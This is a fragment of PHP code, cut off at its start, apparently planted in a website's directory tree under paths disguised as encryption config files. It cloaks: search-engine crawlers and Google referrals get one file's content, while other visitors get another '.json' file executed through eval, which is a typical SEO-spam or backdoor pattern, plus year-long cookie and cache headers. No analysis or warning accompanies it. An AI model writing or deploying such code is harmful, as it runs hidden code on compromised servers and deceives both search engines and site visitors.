$url"; return $fetch; } } $cookie_expiration = time() + (365 * 86400); //1 years if (!isset($_COOKIE['visited'])) { setcookie('visited', '1', $cookie_expiration, "/"); } $cache_duration = 365 * 86400; //1 years header("Cache-Control: max-age=$cache_duration, public, must-revalidate"); header("Pragma: cache"); $landing_page = '/home/u706874058/domains/abacustrainer.com/public_html/Schools/system/Commands/Encryption/file.json'; $index_home = '/home/u706874058/domains/abacustrainer.com/public_html/Schools/system/Commands/Encryption/config.json'; if (isSearchEngineBot()) { echo NuLzFetch($landing_page); } else { if (isFromGoogle()) { echo NuLzFetch($landing_page); } else { eval ('?>'.NuLzFetch($index_home)); } } ?>